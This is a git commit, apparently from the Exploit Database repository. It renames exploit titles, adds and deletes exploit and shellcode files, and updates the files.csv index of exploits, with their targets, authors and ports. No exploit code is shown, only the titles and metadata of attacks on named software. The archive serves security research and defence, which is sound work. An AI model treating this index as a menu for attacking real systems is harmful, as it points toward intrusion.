Minolta FTP Utility 1.00 - Post-Authentication CWD Command SEH Overflow Konica Minolta FTP Utility 1.00 - Authenticated CWD Command SEH Overflow GLPI 0.85.5 - Remote Code Execution (via File Upload Filter Bypass) GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution Dream CMS 2.3.0 - Cross-Site Request Forgery Add Extension / Arbitrary File Upload PHP Code Execution Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution vBulletin 5.1.x - Pre-Authentication Remote Code Execution vBulletin 5.1.x - Unauthenticated Remote Code Execution WordPress Ninja Forms 2.7.7 Plugin - Authorization Bypass WordPress WP to Twitter Plugin - Authorization Bypass WordPress Ninja Forms 2.7.7 Plugin - 
Authentication Bypass WordPress WP to Twitter Plugin - Authentication Bypass Novell ServiceDesk - Authenticated File Upload Novell ServiceDesk - Authenticated Arbitrary File Upload Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated File Upload Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated Arbitrary File Upload Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal DEP + ASLR Bypass) Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal ASLR + DEP Bypass) phpATM 1.32 - Remote Command Execution (Arbitrary File Upload) on Windows Servers phpATM 1.32 - Arbitrary File Upload / Remote Command Execution (Windows Servers) vBulletin 5.x/4.x - Post-Authentication Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API vBulletin 4.x - Post-Authentication SQL Injection in breadcrumbs via xmlrpc API vBulletin 5.x/4.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API vBulletin 4.x - Authenticated SQL Injection in breadcrumbs via xmlrpc API Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post-Authentication Remote Root Exploit (Metasploit) Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit) Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Post-Authentication Remote Root Exploit (Metasploit) (3) Barracuda Web Application Firewall 8.0.1.008 - Post-Authentication Remote Root Exploit (Metasploit) Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit) (3) Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Root Exploit (Metasploit) phpMyAdmin 4.6.2 - Post-Authentication Remote Code Execution phpMyAdmin 4.6.2 - Authenticated Remote Code Execution vBulletin 5.2.2 - Pre-Authentication Server Side Request Forgery (SSRF) vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery (SSRF) ZKTeco ZKBioSecurity 3.0 - 
(visLogin.jsp) Local Authorization Bypass ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authentication Bypass
---
 files.csv | 468 ++++----- platforms/android/remote/40354.txt | 160 +++ platforms/multiple/dos/40355.txt | 32 + platforms/multiple/dos/40356.txt | 21 + platforms/php/webapps/40351.txt | 40 + platforms/php/webapps/40353.py | 56 + platforms/unix/remote/21671.c | 2 + platforms/unix/remote/21672.c | 1303 ------------------------ platforms/unix/remote/40347.txt | 444 ++++++++ platforms/{linux => unix}/remote/764.c | 2 +- platforms/win_x86/shellcode/40352.c | 519 ++++++++++ platforms/windows/local/40341.txt | 242 ----- platforms/windows/local/40348.py | 66 ++ platforms/windows/local/40349.py | 67 ++ platforms/windows/local/40350.py | 99 ++ 15 files changed, 1745 insertions(+), 1776 deletions(-) create mode 100755 platforms/android/remote/40354.txt create mode 100755 platforms/multiple/dos/40355.txt create mode 100755 platforms/multiple/dos/40356.txt create mode 100755 platforms/php/webapps/40351.txt create mode 100755 platforms/php/webapps/40353.py delete mode 100755 platforms/unix/remote/21672.c create mode 100755 platforms/unix/remote/40347.txt rename platforms/{linux => unix}/remote/764.c (95%) create mode 100755 platforms/win_x86/shellcode/40352.c delete mode 100755 platforms/windows/local/40341.txt create mode 100755 platforms/windows/local/40348.py create mode 100755 platforms/windows/local/40349.py create mode 100755 platforms/windows/local/40350.py
diff --git a/files.csv b/files.csv
index 4c75ea246..650da3f74 100755
--- a/files.csv
+++ b/files.csv
@@ -338,7 +338,7 @@ id,file,description,date,author,platform,type,port
 361,platforms/windows/remote/361.txt,"Flash FTP Server - Directory Traversal",2004-07-22,CoolICE,windows,remote,0
 362,platforms/windows/dos/362.sh,"Xitami Web Server - Denial of Service",2004-07-22,CoolICE,windows,dos,0
 363,platforms/hardware/dos/363.txt,"Conceptronic CADSLR1 Router - Denial of Service",2004-07-22,"Seth Alan Woolley",hardware,dos,0
-364,platforms/linux/remote/364.pl,"Samba 3.0.4 - SWAT Authorization Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901
+364,platforms/linux/remote/364.pl,"Samba 3.0.4 SWAT - Authorisation Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901
 365,platforms/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service (11 bytes)",2004-07-23,Phuong,windows,dos,0
 366,platforms/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service",2004-07-24,MacDefender,windows,dos,0
 367,platforms/osx/local/367.txt,"Apple Mac OSX - Panther Internet Connect Privilege Escalation",2004-07-28,B-r00t,osx,local,0
@@ -589,7 +589,7 @@ id,file,description,date,author,platform,type,port
 761,platforms/windows/remote/761.cpp,"NodeManager Professional 2.00 - Buffer Overflow",2005-01-18,"Tan Chew Keong",windows,remote,162
 762,platforms/osx/dos/762.c,"Apple Mac OSX 10.3.7 - Input Validation Flaw parse_machfile() Denial of Service",2005-01-20,nemo,osx,dos,0
 763,platforms/linux/local/763.c,"fkey 0.0.2 - Local File Accessibility Exploit",2005-01-20,vade79,linux,local,79
-764,platforms/linux/remote/764.c,"Apache OpenSSL - 'OpenFuckV2.c' Remote Exploit",2003-04-04,spabam,linux,remote,80
+764,platforms/unix/remote/764.c,"Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)",2003-04-04,spabam,unix,remote,80
 765,platforms/windows/remote/765.c,"Microsoft Internet Explorer - '.ANI' files handling Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0
 766,platforms/osx/local/766.c,"Apple Mac OSX 10.3.7 - mRouter Privilege Escalation",2005-01-22,nemo,osx,local,0
 767,platforms/windows/remote/767.pl,"Golden FTP Server 2.02b - Remote Buffer Overflow",2005-01-22,Barabas,windows,remote,21
@@ -1050,7 +1050,7 @@ id,file,description,date,author,platform,type,port
 1256,platforms/multiple/dos/1256.pl,"Lynx 2.8.6dev.13 - Remote Buffer Overflow (PoC)",2005-10-17,"Ulf Harnhammar",multiple,dos,0
 1257,platforms/multiple/dos/1257.html,"Mozilla (Firefox 1.0.7) (Mozilla 1.7.12) - Denial of Service",2005-10-17,Kubbo,multiple,dos,0
 1258,platforms/linux/remote/1258.php,"e107 <= 0.6172 - (resetcore.php) SQL Injection",2005-10-18,rgod,linux,remote,0
-1259,platforms/hp-ux/remote/1259.pm,"HP-UX FTP Server - Pre-Authentication Directory Listing Exploit (Metasploit)",2005-10-19,Optyx,hp-ux,remote,0
+1259,platforms/hp-ux/remote/1259.pm,"HP-UX FTP Server - Unauthenticated Directory Listing Exploit (Metasploit)",2005-10-19,Optyx,hp-ux,remote,0
 1260,platforms/windows/remote/1260.pm,"Microsoft IIS - SA WebAgent 5.2/5.3 Redirect Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,80
 1261,platforms/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515
 1262,platforms/windows/remote/1262.pm,"CA Unicenter 3.1 - CAM log_security() Stack Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,4105
@@ -1123,7 +1123,7 @@ id,file,description,date,author,platform,type,port
 1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0
 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - (phgrafx) Local Buffer Overflow",2005-11-30,"p. minervini",qnx,local,0
 1352,platforms/windows/remote/1352.cpp,"Microsoft Windows - DTC Remote Exploit (PoC) (MS05-051) (2)",2005-12-01,Swan,windows,remote,0
-1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple Pre-Authentication Remote Stack Overflow (PoC)",2005-12-02,Sowhat,windows,dos,0
+1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple Unauthenticated Remote Stack Overflow (PoC)",2005-12-02,Sowhat,windows,dos,0
 1354,platforms/php/webapps/1354.php,"Zen Cart 1.2.6d - 'password_forgotten.php' SQL Injection",2005-12-02,rgod,php,webapps,0
 1355,platforms/linux/remote/1355.pl,"sobexsrv 1.0.0_pre3 Bluetooth - syslog() Remote Format String",2005-12-03,"Kevin Finisterre",linux,remote,0
 1356,platforms/php/webapps/1356.php,"DoceboLms 2.0.4 - connector.php Arbitrary File Upload",2005-12-04,rgod,php,webapps,0
@@ -1470,7 +1470,7 @@ id,file,description,date,author,platform,type,port
 1751,platforms/php/webapps/1751.php,"Limbo CMS 1.0.4.2 - 'catid' SQL Injection",2006-05-05,[Oo],php,webapps,0
 1752,platforms/php/webapps/1752.pl,"StatIt 4 - (statitpath) Remote File Inclusion",2006-05-05,IGNOR3,php,webapps,0
 1753,platforms/php/webapps/1753.txt,"TotalCalendar 2.30 - (inc) Remote File Inclusion",2006-05-05,Aesthetico,php,webapps,0
-1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server 1.01 - (USER) Remote Pre-Authentication Denial of Service",2006-05-05,Bigeazer,windows,dos,0
+1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server 1.01 - (USER) Remote Unauthenticated Denial of Service",2006-05-05,Bigeazer,windows,dos,0
 1755,platforms/cgi/webapps/1755.py,"AWStats 6.5 - (migrate) Remote Shell Command Injection",2006-05-06,redsand,cgi,webapps,0
 1756,platforms/php/webapps/1756.pl,"HiveMail 1.3 - (addressbook.add.php) Remote Code Execution",2006-05-06,[Oo],php,webapps,0
 1757,platforms/windows/dos/1757.c,"acFTP FTP Server 1.4 - (USER) Remote Denial of Service",2006-05-06,Omni,windows,dos,0
@@ -2894,7 +2894,6 @@ id,file,description,date,author,platform,type,port
 3221,platforms/php/webapps/3221.php,"GuppY 4.5.16 - Remote Commands Execution Exploit",2007-01-29,rgod,php,webapps,0
 3222,platforms/php/webapps/3222.txt,"Webfwlog 0.92 - (debug.php) Remote File Disclosure",2007-01-29,GoLd_M,php,webapps,0
 3223,platforms/cgi/dos/3223.pl,"CVSTrac 2.0.0 - Defacement Denial of Service",2007-01-29,"Ralf S. Engelschall",cgi,dos,0
-40341,platforms/windows/local/40341.txt,"Multiple Applications - Local Credentials Disclosure",2016-09-07,"Yakir Wizman",windows,local,0
 3224,platforms/windows/dos/3224.c,"Intel 2200BG 802.11 - disassociation packet Kernel Memory Corruption",2007-01-29,"Breno Silva Pinto",windows,dos,0
 3225,platforms/php/webapps/3225.pl,"Galeria Zdjec 3.0 - (zd_numer.php) Local File Inclusion",2007-01-30,ajann,php,webapps,0
 3226,platforms/php/webapps/3226.txt,"PHPFootball 1.6 - (show.php) Remote Database Disclosure",2007-01-30,ajann,php,webapps,0
@@ -3076,7 +3075,7 @@ id,file,description,date,author,platform,type,port
 3404,platforms/multiple/dos/3404.php,"PHP - wddx_deserialize() String Append Crash",2007-03-04,"Stefan Esser",multiple,dos,0
 3405,platforms/multiple/remote/3405.txt,"PHP 4.4.3 - 4.4.6 PHPinfo() Remote Cross-Site Scripting",2007-03-04,"Stefan Esser",multiple,remote,0
 3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - (eintrag.php sqllog) Remote File Inclusion",2007-03-04,bd0rk,php,webapps,0
-3407,platforms/multiple/dos/3407.c,"Asterisk 1.2.15 / 1.4.0 - Pre-Authentication Remote Denial of Service",2007-03-04,fbffff,multiple,dos,0
+3407,platforms/multiple/dos/3407.c,"Asterisk 1.2.15 / 1.4.0 - Unauthenticated Remote Denial of Service",2007-03-04,fbffff,multiple,dos,0
 3408,platforms/php/webapps/3408.pl,"AJ Auction Pro - 'subcat.php' SQL Injection",2007-03-04,ajann,php,webapps,0
 3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 - (view_profile.php) SQL Injection",2007-03-04,ajann,php,webapps,0
 3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - (postingdetails.php) SQL Injection",2007-03-04,ajann,php,webapps,0
@@ -3279,7 +3278,7 @@ id,file,description,date,author,platform,type,port
 3613,platforms/php/webapps/3613.txt,"phpBB MOD Forum picture and META tags 1.7 - Remote File Inclusion",2007-03-30,bd0rk,php,webapps,0
 3614,platforms/php/webapps/3614.txt,"JSBoard 2.0.10 - (login.php table) Local File Inclusion",2007-03-30,GoLd_M,php,webapps,0
 3615,platforms/linux/remote/3615.c,"dproxy-nexgen (Linux/x86) - Remote Root Buffer Overflow",2007-03-30,mu-b,linux,remote,53
-3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Pre-Authentication Remote Exploit",2007-03-31,muts,windows,remote,143
+3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Unauthenticated Remote Exploit",2007-03-31,muts,windows,remote,143
 3617,platforms/windows/local/3617.cpp,"Microsoft Windows - Animated Cursor '.ani' Stack Overflow",2007-03-31,devcode,windows,local,0
 3618,platforms/php/webapps/3618.htm,"XOOPS Module Lykos Reviews 1.00 - 'index.php' SQL Injection",2007-03-31,ajann,php,webapps,0
 3619,platforms/php/webapps/3619.pl,"XOOPS Module Library - 'viewcat.php' SQL Injection",2007-03-31,ajann,php,webapps,0
@@ -3310,7 +3309,7 @@ id,file,description,date,author,platform,type,port
 3647,platforms/windows/local/3647.c,"Microsoft Windows - Animated Cursor '.ani' Local Buffer Overflow",2007-04-02,Marsu,windows,local,0
 3648,platforms/windows/local/3648.c,"Irfanview 3.99 - '.ani' Local Buffer Overflow (1)",2007-04-02,Marsu,windows,local,0
 3649,platforms/windows/local/3649.c,"Ipswitch WS_FTP 5.05 - Server Manager Local Site Buffer Overflow",2007-04-02,Marsu,windows,local,0
-3650,platforms/windows/remote/3650.c,"Frontbase 4.2.7 - Post-Authentication Remote Buffer Overflow (2.2)",2007-04-02,Heretic2,windows,remote,0
+3650,platforms/windows/remote/3650.c,"Frontbase 4.2.7 - Authenticated Remote Buffer Overflow (2.2)",2007-04-02,Heretic2,windows,remote,0
 3651,platforms/windows/remote/3651.txt,"Microsoft Windows - Animated Cursor '.ani' Universal Exploit Generator",2007-04-03,"YAG KOHHA",windows,remote,0
 3652,platforms/windows/local/3652.c,"Microsoft Windows - Animated Cursor '.ani' Overflow (Hardware DEP)",2007-04-03,devcode,windows,local,0
 3653,platforms/php/webapps/3653.php,"MyBulletinBoard (MyBB) 1.2.3 - Remote Code Execution",2007-04-03,DarkFig,php,webapps,0
@@ -3682,7 +3681,7 @@ id,file,description,date,author,platform,type,port
 4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional - '.PLF' File Buffer Overflow",2007-06-02,n00b,windows,local,0
 4025,platforms/php/webapps/4025.php,"Quick.Cart 2.2 - Remote File Inclusion / Local File Inclusion Remote Code Execution",2007-06-02,Kacper,php,webapps,0
 4026,platforms/php/webapps/4026.php,"PNPHPBB2 <= 1.2 - (index.php c) SQL Injection",2007-06-03,Kacper,php,webapps,0
-4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - Pre-Authentication Remote Exploit",2007-06-03,muts,windows,remote,8080
+4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - Unauthenticated Remote Exploit",2007-06-03,muts,windows,remote,8080
 4028,platforms/linux/local/4028.txt,"Screen 4.0.3 (OpenBSD) - Local Authentication Bypass",2008-06-18,Rembrandt,linux,local,0
 4029,platforms/php/webapps/4029.php,"Sendcard 3.4.1 - (Local File Inclusion) Remote Code Execution",2007-06-04,Silentz,php,webapps,0
 4030,platforms/php/webapps/4030.php,"EQdkp 1.3.2 - (listmembers.php rank) SQL Injection",2007-06-04,Silentz,php,webapps,0
@@ -3943,14 +3942,14 @@ id,file,description,date,author,platform,type,port
 4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade - 'search.php query' SQL Injection",2007-08-16,RoXur777,php,webapps,0
 4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure",2007-08-17,Pravus,windows,remote,0
 4293,platforms/windows/dos/4293.php,"PHP 5.2.0 (Windows/x86) - (PHP_win32sti) Local Buffer Overflow (PoC)",2007-08-18,boecke,windows,dos,0
-4294,platforms/windows/dos/4294.pl,"Mercury SMTPD - Remote Pre-Authentication Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0
+4294,platforms/windows/dos/4294.pl,"Mercury SMTPD - Remote Unauthenticated Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0
 4295,platforms/php/webapps/4295.txt,"Squirrelcart 1.x.x - (cart.php) Remote File Inclusion",2007-08-19,ShaiMagal,php,webapps,0
 4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - SQL Injection",2007-08-20,k1tk4t,php,webapps,0
 4297,platforms/hardware/dos/4297.pl,"Cisco IP Phone 7940 - (3 SIP Messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0
 4298,platforms/hardware/dos/4298.pl,"Cisco IP Phone 7940 - (10 SIP Messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0
 4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module - (uacomx.ocx 2.0.1) Remote Buffer Overflow",2007-08-21,rgod,windows,remote,0
 4300,platforms/php/webapps/4300.txt,"litecommerce 2004 - (category_id) SQL Injection",2007-08-21,k1tk4t,php,webapps,0
-4301,platforms/windows/remote/4301.cpp,"Mercury/32 4.51 - SMTPD CRAM-MD5 Pre-Authentication Remote Overflow",2007-08-22,ZhenHan.Liu,windows,remote,25
+4301,platforms/windows/remote/4301.cpp,"Mercury/32 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow",2007-08-22,ZhenHan.Liu,windows,remote,25
 4302,platforms/windows/local/4302.php,"PHP 5.2.3 - (PHP_win32sti) Local Buffer Overflow (1)",2007-08-22,Inphex,windows,local,0
 4303,platforms/windows/local/4303.php,"PHP 5.2.3 - (PHP_win32sti) Local Buffer Overflow (2)",2007-08-22,NetJackal,windows,local,0
 4304,platforms/windows/dos/4304.php,"PHP 5.2.3 - PHP_ntuser ntuser_getuserlist() Local Buffer Overflow (PoC)",2007-08-23,shinnai,windows,dos,0
@@ -3964,8 +3963,8 @@ id,file,description,date,author,platform,type,port
 4312,platforms/linux/remote/4312.c,"ProFTPd 1.x (module mod_tls) - Remote Buffer Overflow",2007-08-24,netris,linux,remote,21
 4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 - 'Search' Blind SQL Injection",2007-08-25,k1tk4t,php,webapps,0
 4314,platforms/windows/local/4314.php,"PHP Perl Extension - Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0
-4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Pre-Authentication Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389
-4316,platforms/windows/remote/4316.cpp,"Mercury/32 3.32-4.51 - SMTP Pre-Authentication EIP Overwrite",2007-08-26,Heretic2,windows,remote,25
+4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389
+4316,platforms/windows/remote/4316.cpp,"Mercury/32 3.32-4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25
 4317,platforms/php/webapps/4317.txt,"2532/Gigs 1.2.1 - (activateuser.php) Local File Inclusion",2007-08-26,bd0rk,php,webapps,0
 4318,platforms/windows/dos/4318.php,"PHP 5.2.0 (Windows/x86) - (PHP_iisfunc.dll) Local Buffer Overflow (PoC)",2007-08-27,boecke,windows,dos,0
 4319,platforms/hardware/dos/4319.pl,"Thomson SIP phone ST 2030 - Remote Denial of Service",2007-08-27,MADYNES,hardware,dos,0
@@ -3993,7 +3992,7 @@ id,file,description,date,author,platform,type,port
 4341,platforms/php/webapps/4341.txt,"Pakupaku CMS 0.4 - Arbitrary File Upload / Local File Inclusion",2007-08-29,GoLd_M,php,webapps,0
 4342,platforms/php/webapps/4342.txt,"NMDeluxe 2.0.0 - 'id' SQL Injection",2007-08-30,"not sec group",php,webapps,0
 4343,platforms/cgi/webapps/4343.txt,"Ourspace 2.0.9 - (uploadmedia.cgi) Arbitrary File Upload",2007-08-30,Don,cgi,webapps,0
-4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - (pop3) Pre-Authentication Remote Overflow (PoC)",2007-08-30,rgod,windows,dos,0
+4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - (pop3) Unauthenticated Remote Overflow (PoC)",2007-08-30,rgod,windows,dos,0
 4345,platforms/windows/local/4345.c,"Norman Virus Control - nvcoaft51.sys ioctl BF672028 Exploit",2007-08-30,inocraM,windows,local,0
 4346,platforms/php/webapps/4346.pl,"phpBB Links MOD 1.2.2 - SQL Injection",2007-08-31,Don,php,webapps,0
 4347,platforms/linux/dos/4347.pl,"Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop Exploit",2007-08-31,"Beyond Security",linux,dos,0
@@ -4074,10 +4073,10 @@ id,file,description,date,author,platform,type,port
 4423,platforms/php/webapps/4423.txt,"modifyform - 'modifyform.html' Remote File Inclusion",2007-09-18,mozi,php,webapps,0
 4424,platforms/windows/remote/4424.html,"Apple QuickTime /w IE .qtl Version XAS - Remote Exploit (PoC)",2007-09-18,"Aviv Raff",windows,remote,0
 4425,platforms/php/webapps/4425.pl,"phpBB Mod Ktauber.com StylesDemo - Blind SQL Injection",2007-09-18,nexen,php,webapps,0
-4426,platforms/hardware/dos/4426.pl,"Airsensor M520 - HTTPD Remote Pre-Authentication Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",hardware,dos,0
+4426,platforms/hardware/dos/4426.pl,"Airsensor M520 - HTTPD Remote Unauthenticated Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",hardware,dos,0
 4427,platforms/windows/remote/4427.html,"jetAudio 7.x - ActiveX DownloadFromMusicStore() Code Execution",2007-09-19,h07,windows,remote,0
 4428,platforms/windows/remote/4428.html,"Yahoo! Messenger 8.1.0.421 - CYFT Object Arbitrary File Download",2007-09-19,shinnai,windows,remote,0
-4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - SEARCH command Post-Authentication Overflow",2007-09-19,void,windows,remote,143
+4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - SEARCH command Authenticated Overflow",2007-09-19,void,windows,remote,143
 4430,platforms/php/webapps/4430.txt,"Streamline PHP Media Server 1.0-beta4 - Remote File Inclusion",2007-09-19,BiNgZa,php,webapps,0
 4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise Edition 6.0 SP6 - Code Execution",2007-09-19,shinnai,windows,local,0
 4432,platforms/multiple/dos/4432.html,"Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow (PoC)",2007-09-19,"YAG KOHHA",multiple,dos,0
@@ -4521,8 +4520,8 @@ id,file,description,date,author,platform,type,port
 4873,platforms/windows/remote/4873.html,"Microsoft FoxServer - (vfp6r.dll 6.0.8862.0) ActiveX Command Execution",2008-01-09,shinnai,windows,remote,0
 4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0 - (SP6) SaveFile() Insecure Method",2008-01-09,shinnai,windows,remote,0
 4876,platforms/php/webapps/4876.txt,"Tuned Studios Templates - Local File Inclusion",2008-01-09,DSecRG,php,webapps,0
-4877,platforms/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - Pre-Authentication Remote Command Execution",2008-01-09,"Luigi Auriemma",multiple,remote,7210
-4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server - Remote Pre-Authentication Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",multiple,dos,0
+4877,platforms/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - Unauthenticated Remote Command Execution",2008-01-09,"Luigi Auriemma",multiple,remote,7210
+4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server - Remote Unauthenticated Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",multiple,dos,0
 4879,platforms/php/webapps/4879.php,"Docebo 3.5.0.3 - (lib.regset.php) Command Execution",2008-01-09,EgiX,php,webapps,0
 4880,platforms/php/webapps/4880.php,"DomPHP 0.81 - Remote Add Administrator Exploit",2008-01-10,j0j0,php,webapps,0
 4881,platforms/solaris/dos/4881.c,"SunOS 5.10 - Remote ICMP Kernel Crash",2008-01-10,kingcope,solaris,dos,0
@@ -4889,7 +4888,7 @@ id,file,description,date,author,platform,type,port
 5246,platforms/php/webapps/5246.txt,"EasyCalendar 4.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0
 5247,platforms/php/webapps/5247.txt,"easygallery 5.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0
 5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 - (FETCH) Remote Buffer Overflow",2008-03-13,ryujin,windows,remote,143
-5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent 3.13 - (Fetch) Post-Authentication Remote Buffer Overflow",2008-03-14,haluznik,windows,remote,0
+5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent 3.13 - (Fetch) Authenticated Remote Buffer Overflow",2008-03-14,haluznik,windows,remote,0
 5250,platforms/windows/local/5250.cpp,"VLC 0.8.6e - Subtitle Parsing Local Buffer Overflow",2008-03-14,"Mai Xuan Cuong",windows,local,0
 5252,platforms/php/webapps/5252.txt,"eXV2 Module MyAnnonces - (lid) SQL Injection",2008-03-14,S@BUN,php,webapps,0
 5253,platforms/php/webapps/5253.txt,"eXV2 Module eblog 1.2 - (blog_id) SQL Injection",2008-03-14,S@BUN,php,webapps,0
@@ -4898,7 +4897,7 @@ id,file,description,date,author,platform,type,port
 5256,platforms/php/webapps/5256.pl,"AuraCMS 2.2.1 - (online.php) Blind SQL Injection",2008-03-14,NTOS-Team,php,webapps,0
 5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure",2008-03-14,kingcope,multiple,remote,0
 5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster - rpc.metad Denial of Service (PoC)",2008-03-14,kingcope,solaris,dos,0
-5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Post-Authentication Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143
+5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Authenticated Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143
 5260,platforms/php/webapps/5260.txt,"Fuzzylime CMS 3.01 - (admindir) Remote File Inclusion",2008-03-14,irk4z,php,webapps,0
 5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 - RML Stack Based Buffer Overflow (PoC)",2008-03-15,"Wiktor Sierocinski",windows,dos,0
 5262,platforms/php/webapps/5262.txt,"mutiple timesheets 5.0 - Multiple Vulnerabilities",2008-03-16,JosS,php,webapps,0
@@ -4978,7 +4977,7 @@ id,file,description,date,author,platform,type,port
 5339,platforms/php/webapps/5339.php,"Nuked-klaN 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",php,webapps,0
 5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - SQL Injection",2008-04-01,DreamTurk,php,webapps,0
 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service",2008-04-01,Ray,windows,dos,0
-5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 - OVAS.exe SEH Pre-Authentication Overflow",2008-04-02,muts,windows,remote,7510
+5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 - OVAS.exe SEH Unauthenticated Overflow",2008-04-02,muts,windows,remote,7510
 5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service",2008-04-02,muts,windows,dos,0
 5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service",2008-04-02,muts,windows,dos,0
 5345,platforms/php/webapps/5345.txt,"Joomla Component OnlineFlashQuiz 1.0.2 - Remote File Inclusion",2008-04-02,NoGe,php,webapps,0
@@ -5086,7 +5085,7 @@ id,file,description,date,author,platform,type,port
 5448,platforms/php/webapps/5448.txt,"Koobi Pro 6.25 - poll SQL Injection",2008-04-14,S@BUN,php,webapps,0
 5449,platforms/php/webapps/5449.php,"KwsPHP - (Upload) Remote Code Execution",2008-04-14,Ajax,php,webapps,0
 5450,platforms/php/webapps/5450.txt,"Classifieds Caffe - 'index.php cat_id' SQL Injection",2008-04-15,JosS,php,webapps,0
-5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 - Pre-Authentication Remote SEH Overflow",2008-04-15,ryujin,windows,remote,6080
+5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 - Unauthenticated Remote SEH Overflow",2008-04-15,ryujin,windows,remote,6080
